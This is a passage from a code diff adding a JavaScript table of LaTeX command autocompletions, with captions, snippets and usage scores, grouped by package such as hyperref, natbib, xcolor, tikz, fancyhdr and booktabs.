meta: 'hyperref-cmd', + score: 1.4380093454211778, + }, + { + caption: '\\Alph{}', + snippet: '\\Alph{$1}', + meta: 'hyperref-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\Alph', + snippet: '\\Alph', + meta: 'hyperref-cmd', + score: 0.002233258780143355, + }, + { + caption: '\\appendix', + snippet: '\\appendix', + meta: 'hyperref-cmd', + score: 0.047007158741781095, + }, + { + caption: '\\MP', + snippet: '\\MP', + meta: 'hyperref-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\MP{}', + snippet: '\\MP{$1}', + meta: 'hyperref-cmd', + score: 0.00018344383742255004, + }, + { + caption: '\\paragraphautorefname', + snippet: '\\paragraphautorefname', + meta: 'hyperref-cmd', + score: 0.0005446476945175932, + }, + { + caption: '\\citeN{}', + snippet: '\\citeN{$1}', + meta: 'hyperref-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\citeN', + snippet: '\\citeN', + meta: 'hyperref-cmd', + score: 0.0018503938529945614, + }, + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'hyperref-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\subsectionautorefname', + snippet: '\\subsectionautorefname', + meta: 'hyperref-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\subsectionautorefname{}', + snippet: '\\subsectionautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.0012546605780895737, + }, + { + caption: '\\hyperref[]{}', + snippet: '\\hyperref[$1]{$2}', + meta: 'hyperref-cmd', + score: 0.004515152477030062, + }, + { + caption: '\\arabic{}', + snippet: '\\arabic{$1}', + meta: 'hyperref-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\arabic', + snippet: '\\arabic', + meta: 'hyperref-cmd', + score: 0.02445837629741638, + }, + { + caption: '\\newline', + snippet: '\\newline', + meta: 'hyperref-cmd', + score: 0.3311721696201715, + }, + { + caption: '\\hypersetup{}', + snippet: '\\hypersetup{$1}', + meta: 'hyperref-cmd', + score: 0.06967310843464661, + }, + { + caption: '\\subsubsectionautorefname', + snippet: '\\subsubsectionautorefname', + meta: 'hyperref-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\subsubsectionautorefname{}', + snippet: '\\subsubsectionautorefname{$1}', + meta: 'hyperref-cmd', + score: 0.0012064581899162352, + }, + { + caption: '\\title{}', + snippet: '\\title{$1}', + meta: 'hyperref-cmd', + score: 0.9202908262245683, + }, + { + caption: 
'\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'hyperref-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'hyperref-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'hyperref-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'hyperref-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'hyperref-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'hyperref-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'hyperref-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'hyperref-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'hyperref-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'hyperref-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'hyperref-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'hyperref-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\AtBeginShipout{}', + snippet: '\\AtBeginShipout{$1}', + meta: 'hyperref-cmd', + score: 0.00047530324346933345, + }, + { + caption: '\\AtBeginShipoutNext{}', + snippet: '\\AtBeginShipoutNext{$1}', + meta: 'hyperref-cmd', + score: 0.0005277905480209891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 
0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'hyperref-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'hyperref-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'hyperref-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'hyperref-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'hyperref-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hyperref-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hyperref-cmd', + score: 0.00530510025314411, + }, + ], + babel: [ + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'babel-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'babel-cmd', + score: 0.021170869458413965, + }, + ], + color: [ + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'color-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'color-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'color-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'color-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'color-cmd', + score: 0.16906710888680052, + }, + { + caption: 
'\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'color-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'color-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'color-cmd', + score: 0.2864294797053033, + }, + ], + xcolor: [ + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'xcolor-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'xcolor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'xcolor-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'xcolor-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'xcolor-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'xcolor-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'xcolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'xcolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'xcolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'xcolor-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'xcolor-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'xcolor-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'xcolor-cmd', + score: 0.2864294797053033, + }, + ], + natbib: [ + { + caption: '\\citealt{}', + snippet: '\\citealt{$1}', + meta: 'natbib-cmd', + score: 0.007302105441724955, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'natbib-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'natbib-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\textsuperscript{}', + snippet: '\\textsuperscript{$1}', + meta: 'natbib-cmd', + score: 0.05216393882408519, + }, + { + caption: '\\nocite{}', + snippet: '\\nocite{$1}', + meta: 'natbib-cmd', + score: 0.04990693820960752, + }, + { + caption: '\\bibname', + snippet: '\\bibname', + meta: 'natbib-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibname{}', + snippet: '\\bibname{$1}', + meta: 'natbib-cmd', + score: 0.007599529252128519, + }, + { + caption: '\\bibpunct', + snippet: '\\bibpunct', + meta: 'natbib-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct{}{}{}{}{}{}', + snippet: '\\bibpunct{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'natbib-cmd', + score: 0.001148574749873469, + }, + { + caption: '\\bibpunct[]{}{}{}{}{}{}', + snippet: '\\bibpunct[$1]{$2}{$3}{$4}{$5}{$6}{$7}', + meta: 'natbib-cmd', + score: 
0.001148574749873469, + }, + { + caption: '\\citepalias{}', + snippet: '\\citepalias{$1}', + meta: 'natbib-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\citepalias[][]{}', + snippet: '\\citepalias[$1][$2]{$3}', + meta: 'natbib-cmd', + score: 0.00032712684909035603, + }, + { + caption: '\\makeindex', + snippet: '\\makeindex', + meta: 'natbib-cmd', + score: 0.010304996748556729, + }, + { + caption: '\\citep{}', + snippet: '\\citep{$1}', + meta: 'natbib-cmd', + score: 0.2941882834697057, + }, + { + caption: '\\bibsection', + snippet: '\\bibsection', + meta: 'natbib-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\bibsection{}', + snippet: '\\bibsection{$1}', + meta: 'natbib-cmd', + score: 0.00038872734530908233, + }, + { + caption: '\\refname', + snippet: '\\refname', + meta: 'natbib-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\refname{}', + snippet: '\\refname{$1}', + meta: 'natbib-cmd', + score: 0.006490238196722249, + }, + { + caption: '\\citealp{}', + snippet: '\\citealp{$1}', + meta: 'natbib-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\citealp[]{}', + snippet: '\\citealp[$1]{$2}', + meta: 'natbib-cmd', + score: 0.005275912376595364, + }, + { + caption: '\\cite{}', + snippet: '\\cite{$1}', + meta: 'natbib-cmd', + score: 2.341195220791228, + }, + { + caption: '\\citetalias{}', + snippet: '\\citetalias{$1}', + meta: 'natbib-cmd', + score: 0.001419571355756266, + }, + { + caption: '\\bibitem{}', + snippet: '\\bibitem{$1}', + meta: 'natbib-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\bibitem[]{}', + snippet: '\\bibitem[$1]{$2}', + meta: 'natbib-cmd', + score: 0.3689547570562042, + }, + { + caption: '\\citet{}', + snippet: '\\citet{$1}', + meta: 'natbib-cmd', + score: 0.09046048561361801, + }, + { + caption: '\\defcitealias{}{}', + snippet: '\\defcitealias{$1}{$2}', + meta: 'natbib-cmd', + score: 0.00042021825647418025, + }, + { + caption: '\\aftergroup', + snippet: '\\aftergroup', + meta: 'natbib-cmd', + score: 0.002020423627422133, + }, + { + caption: '\\setcitestyle{}', + snippet: '\\setcitestyle{$1}', + meta: 'natbib-cmd', + score: 0.0015840652870152204, + }, + { + caption: '\\citeyearpar{}', + snippet: '\\citeyearpar{$1}', + meta: 'natbib-cmd', + score: 0.001877888310324327, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'natbib-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'natbib-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\newblock', + snippet: '\\newblock', + meta: 'natbib-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\newblock{}', + snippet: '\\newblock{$1}', + meta: 'natbib-cmd', + score: 0.03684301726876973, + }, + { + caption: '\\bibnumfmt', + snippet: '\\bibnumfmt', + meta: 'natbib-cmd', + score: 0.000353353600267394, + }, + { + caption: '\\citeyear{}', + snippet: '\\citeyear{$1}', + meta: 'natbib-cmd', + score: 0.01091041305836494, + }, + { + caption: '\\citeauthor{}', + snippet: '\\citeauthor{$1}', + meta: 'natbib-cmd', + score: 0.01359248786373484, + }, + ], + url: [ + { + caption: '\\UrlBreaks{}', + snippet: '\\UrlBreaks{$1}', + meta: 'url-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\UrlBreaks', + snippet: '\\UrlBreaks', + meta: 'url-cmd', + score: 0.001030592515645366, + }, + { + caption: '\\Url', + snippet: '\\Url', + meta: 'url-cmd', + score: 0.0002854206807593436, + }, + { + caption: '\\UrlOrds{}', + snippet: '\\UrlOrds{$1}', + meta: 'url-cmd', + score: 
0.0006882563723629154, + }, + { + caption: '\\UrlOrds', + snippet: '\\UrlOrds', + meta: 'url-cmd', + score: 0.0006882563723629154, + }, + { + caption: '\\urlstyle{}', + snippet: '\\urlstyle{$1}', + meta: 'url-cmd', + score: 0.010515056688180681, + }, + { + caption: '\\urldef{}', + snippet: '\\urldef{$1}', + meta: 'url-cmd', + score: 0.008041789461944983, + }, + { + caption: '\\UrlBigBreaks{}', + snippet: '\\UrlBigBreaks{$1}', + meta: 'url-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlFont{}', + snippet: '\\UrlFont{$1}', + meta: 'url-cmd', + score: 0.0032990580087398644, + }, + { + caption: '\\UrlSpecials{}', + snippet: '\\UrlSpecials{$1}', + meta: 'url-cmd', + score: 3.7048287721105874e-5, + }, + { + caption: '\\UrlNoBreaks', + snippet: '\\UrlNoBreaks', + meta: 'url-cmd', + score: 3.7048287721105874e-5, + }, + ], + fontenc: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fontenc-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'fontenc-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'fontenc-cmd', + score: 0.021170869458413965, + }, + ], + tikz: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'tikz-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'tikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'tikz-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'tikz-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'tikz-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'tikz-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'tikz-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 
'tikz-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolors{}', + snippet: '\\definecolors{$1}', + meta: 'tikz-cmd', + score: 0.0003209840085766927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'tikz-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\colorlet{}{}', + snippet: '\\colorlet{$1}{$2}', + meta: 'tikz-cmd', + score: 0.03654388342026623, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'tikz-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\selectcolormodel{}', + snippet: '\\selectcolormodel{$1}', + meta: 'tikz-cmd', + score: 0.000264339771769041, + }, + { + caption: '\\rowcolors{}{}{}', + snippet: '\\rowcolors{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.0014120076489723356, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'tikz-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'tikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'tikz-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'tikz-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'tikz-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'tikz-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'tikz-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'tikz-cmd', + score: 0.2864294797053033, + }, + ], + fancyhdr: [ + { + caption: '\\lhead{}', + snippet: '\\lhead{$1}', + meta: 'fancyhdr-cmd', + score: 0.05268978171228714, + }, + { + caption: '\\chaptermark', + snippet: '\\chaptermark', + meta: 'fancyhdr-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\chaptermark{}', + snippet: '\\chaptermark{$1}', + meta: 'fancyhdr-cmd', + score: 0.005924520024686584, + }, + { + caption: '\\fancypagestyle{}{}', + snippet: '\\fancypagestyle{$1}{$2}', + meta: 'fancyhdr-cmd', + score: 0.009430919590937878, + }, + { + caption: '\\footrule', + snippet: '\\footrule', + meta: 'fancyhdr-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\footrule{}', + snippet: '\\footrule{$1}', + meta: 'fancyhdr-cmd', + score: 0.0010032754348913366, + }, + { + caption: '\\fancyfoot[]{}', + snippet: '\\fancyfoot[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfoot{}', + snippet: '\\fancyfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.024973618823189894, + }, + { + caption: '\\fancyfootoffset[]{}', + snippet: '\\fancyfootoffset[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\fancyfootoffset{}', + snippet: '\\fancyfootoffset{$1}', + meta: 'fancyhdr-cmd', + score: 0.0015373246231684555, + }, + { + caption: '\\footruleskip', + snippet: '\\footruleskip', + meta: 'fancyhdr-cmd', + score: 0.000830117957327721, + }, + { + caption: '\\fancyheadoffset[]{}', + snippet: 
'\\fancyheadoffset[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\fancyheadoffset{}', + snippet: '\\fancyheadoffset{$1}', + meta: 'fancyhdr-cmd', + score: 0.0016786568695309166, + }, + { + caption: '\\iffloatpage{}{}', + snippet: '\\iffloatpage{$1}{$2}', + meta: 'fancyhdr-cmd', + score: 6.606286310833368e-5, + }, + { + caption: '\\cfoot{}', + snippet: '\\cfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.013411641301057813, + }, + { + caption: '\\subsectionmark', + snippet: '\\subsectionmark', + meta: 'fancyhdr-cmd', + score: 3.1153423008593836e-5, + }, + { + caption: '\\footrulewidth', + snippet: '\\footrulewidth', + meta: 'fancyhdr-cmd', + score: 0.011424740897486949, + }, + { + caption: '\\fancyhfoffset[]{}', + snippet: '\\fancyhfoffset[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 3.741978601121172e-5, + }, + { + caption: '\\rhead{}', + snippet: '\\rhead{$1}', + meta: 'fancyhdr-cmd', + score: 0.022782817416731292, + }, + { + caption: '\\fancyplain{}{}', + snippet: '\\fancyplain{$1}{$2}', + meta: 'fancyhdr-cmd', + score: 0.007402339896386138, + }, + { + caption: '\\rfoot{}', + snippet: '\\rfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.013393817825547868, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'fancyhdr-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\plainheadrulewidth', + snippet: '\\plainheadrulewidth', + meta: 'fancyhdr-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\baselinestretch', + snippet: '\\baselinestretch', + meta: 'fancyhdr-cmd', + score: 0.03225350148161425, + }, + { + caption: '\\lfoot{}', + snippet: '\\lfoot{$1}', + meta: 'fancyhdr-cmd', + score: 0.00789399846642229, + }, + { + caption: '\\MakeUppercase{}', + snippet: '\\MakeUppercase{$1}', + meta: 'fancyhdr-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\MakeUppercase', + snippet: '\\MakeUppercase', + meta: 'fancyhdr-cmd', + score: 0.006776001543888959, + }, + { + caption: '\\fancyhf{}', + snippet: '\\fancyhf{$1}', + meta: 'fancyhdr-cmd', + score: 0.02314618933449356, + }, + { + caption: '\\sectionmark', + snippet: '\\sectionmark', + meta: 'fancyhdr-cmd', + score: 0.005008938879210868, + }, + { + caption: '\\fancyhead[]{}', + snippet: '\\fancyhead[$1]{$2}', + meta: 'fancyhdr-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\fancyhead{}', + snippet: '\\fancyhead{$1}', + meta: 'fancyhdr-cmd', + score: 0.039101068064744296, + }, + { + caption: '\\nouppercase{}', + snippet: '\\nouppercase{$1}', + meta: 'fancyhdr-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\nouppercase', + snippet: '\\nouppercase', + meta: 'fancyhdr-cmd', + score: 0.006416387071584083, + }, + { + caption: '\\headrule', + snippet: '\\headrule', + meta: 'fancyhdr-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\headrule{}', + snippet: '\\headrule{$1}', + meta: 'fancyhdr-cmd', + score: 0.0008327432627715623, + }, + { + caption: '\\chead{}', + snippet: '\\chead{$1}', + meta: 'fancyhdr-cmd', + score: 0.00755042164734884, + }, + { + caption: '\\headrulewidth', + snippet: '\\headrulewidth', + meta: 'fancyhdr-cmd', + score: 0.02268137935335823, + }, + ], + booktabs: [ + { + caption: '\\specialrule{}{}{}', + snippet: '\\specialrule{$1}{$2}{$3}', + meta: 'booktabs-cmd', + score: 0.004974385202605165, + }, + { + caption: '\\cmidrule', + snippet: '\\cmidrule', + meta: 'booktabs-cmd', + score: 0.01894952272365088, + }, + { + caption: '\\cmidrule{}', + snippet: '\\cmidrule{$1}', + meta: 'booktabs-cmd', + score: 0.01894952272365088, + }, + 
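+ // Consumption sketch (based on MetaHandler.extractMetaFromDoc above, not part of the generated data): a doc line such as '\\usepackage{booktabs}' adds 'booktabs' to docMeta.packageNames, and packageMapping['booktabs'] -- the entries in this block -- is copied into docMeta.packages, letting the editor offer completions like \\toprule and \\midrule ranked by score.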
